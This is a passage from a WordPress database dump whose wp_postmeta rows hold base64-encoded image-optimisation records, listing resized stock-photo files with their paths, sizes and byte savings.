dXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDc4NjMwODYtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA3ODYzMDg2LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo1MDYsInRpbWUiOjE0ODM1ODQ3OTAsImlkIjo2ODh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwNzg2MzA4Ni01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDc4NjMwODYtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA3ODYzMDg2LTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxMDI5LCJ0aW1lIjoxNDgzNTg0NzkzLCJpZCI6Njg4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwNzg2MzA4Ni0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDc4NjMwODYtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA3ODYzMDg2LTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjo1MDQsInRpbWUiOjE0ODM1ODQ3OTcsImlkIjo2ODh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA3ODYzMDg2LTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwNzg2MzA4Ni0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDc4NjMwODYtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjYxMCwidGltZSI6MTQ4MzU4NDgwMCwiaWQiOjY4OH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDc4NjMwODYtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA3ODYzMDg2LTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwNzg2MzA4Ni0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6Njk2LCJ0aW1lIjoxNDgzNTg0ODA0LCJpZCI6Njg4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwNzg2MzA4Ni0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDc4NjMwODYtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA3ODYzMDg2LTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo4MzUsInRpbWUiOjE0ODM1ODQ4MDcsImlkIjo2ODh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA3ODYzMDg2LTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwNzg2MzA4Ni00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDc4NjMwODYtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjkwOCwidGltZSI6MTQ4MzU4NDgxMSwiaWQiOjY4OH1d'); 
INSERT INTO `wp_postmeta` VALUES (30103, 687, 'wpfc_optimisation_reduction', '21352'); 
INSERT INTO `wp_postmeta` VALUES (30104, 687, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwNzgxNzgzMS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDc4MTc4MzEuanBnIiwid2lkdGgiOjI2MjQsImhlaWdodCI6NDI0MCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU4NDgxNiwiaWQiOiI2ODcifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDc4MTc4MzEtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA3ODE3ODMxLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwNzgxNzgzMS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6ODM3LCJ0aW1lIjoxNDgzNTg0ODE5LCJpZCI6Njg3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDc4MTc4MzEtNDk1eDgwMC5qcGciLCJ3aWR0aCI6NDk1LCJoZWlnaHQiOjgwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA3ODE3ODMxLTQ5NXg4MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwNzgxNzgzMS00OTV4ODAwLmpwZyIsInJlZHVjdGlvbiI6MTk1MiwidGltZSI6MTQ4MzU4NDgyMywiaWQiOjY4N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA3ODE3ODMxLTc2OHgxMjQxLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6MTI0MSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA3ODE3ODMxLTc2OHgxMjQxLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDc4MTc4MzEtNzY4eDEyNDEuanBnIiwicmVkdWN0aW9uIjo0MzA1LCJ0aW1lIjoxNDgzNTg0ODI4LCJpZCI6Njg3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDc4MTc4MzEtOTkweDE2MDAuanBnIiwid2lkdGgiOjk5MCwiaGVpZ2h0IjoxNjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDc4MTc4MzEtOTkweDE2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwNzgxNzgzMS05OTB4MTYwMC5qcGciLCJyZWR1Y3Rpb24iOjY3NDgsInRpbWUiOjE0ODM1ODQ4MzMsImlkIjo2ODd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwNzgxNzgzMS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDc4MTc4MzEtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA3ODE3ODMxLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo2NjIsInRpbWUiOjE0ODM1ODQ4MzcsImlkIjo2ODd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwNzgxNzgzMS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDc4MTc4MzEtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA3ODE3ODMxLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo1MDYsInRpbWUiOjE0ODM1ODQ4NDAsImlkIjo2ODd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwNzgxNzgzMS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDc4MTc4MzEtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA3ODE3ODMxLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo1OTAsInRpbWUiOjE0ODM1ODQ4NDMsImlkIjo2ODd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwNzgxNzgzMS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDc4MTc4MzEtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA3ODE3ODMxLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxNjM0LCJ0aW1lIjoxNDgzNTg0ODQ3LCJpZCI6Njg3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwNzgxNzgzMS0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDc4MTc4MzEtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA3ODE3ODMxLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjo1MDEsInRpbWUiOjE0ODM1ODQ4NTEsImlkIjo2ODd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA3ODE3ODMxLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwNzgxNzgzMS0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDc4MTc4MzEtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjU5OCwidGltZSI6MTQ4MzU4NDg1NCwiaWQiOjY4N30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDc4MTc4MzEtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA3ODE3ODMxLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwNzgxNzgzMS0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6ODA0LCJ0aW1lIjoxNDgzNTg0ODU4LCJpZCI6Njg3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwNzgxNzgzMS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDc4MTc4MzEtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA3ODE3ODMxLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo5NDgsInRpbWUiOjE0ODM1ODQ4NjEsImlkIjo2ODd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA3ODE3ODMxLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwNzgxNzgzMS00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDc4MTc4MzEtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEyNjcsInRpbWUiOjE0ODM1ODQ4NjUsImlkIjo2ODd9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30105, 686, 'wpfc_optimisation_reduction', '20128'); 
INSERT INTO `wp_postmeta` VALUES (30106, 686, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE5NDI1NTUzMS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xOTQyNTU1MzEuanBnIiwid2lkdGgiOjU2MTYsImhlaWdodCI6Mzc0NCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU4NDg3MCwiaWQiOiI2ODYifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xOTQyNTU1MzEtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTk0MjU1NTMxLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE5NDI1NTUzMS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6ODA0LCJ0aW1lIjoxNDgzNTg0ODczLCJpZCI6Njg2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xOTQyNTU1MzEtODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTk0MjU1NTMxLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE5NDI1NTUzMS04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MjE1NiwidGltZSI6MTQ4MzU4NDg3NywiaWQiOjY4Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTk0MjU1NTMxLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE5NDI1NTUzMS03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xOTQyNTU1MzEtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjE5MzAsInRpbWUiOjE0ODM1ODQ4ODEsImlkIjo2ODZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE5NDI1NTUzMS0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTk0MjU1NTMxLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTk0MjU1NTMxLTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjkwNjgsInRpbWUiOjE0ODM1ODQ4ODUsImlkIjo2ODZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE5NDI1NTUzMS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xOTQyNTU1MzEtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvan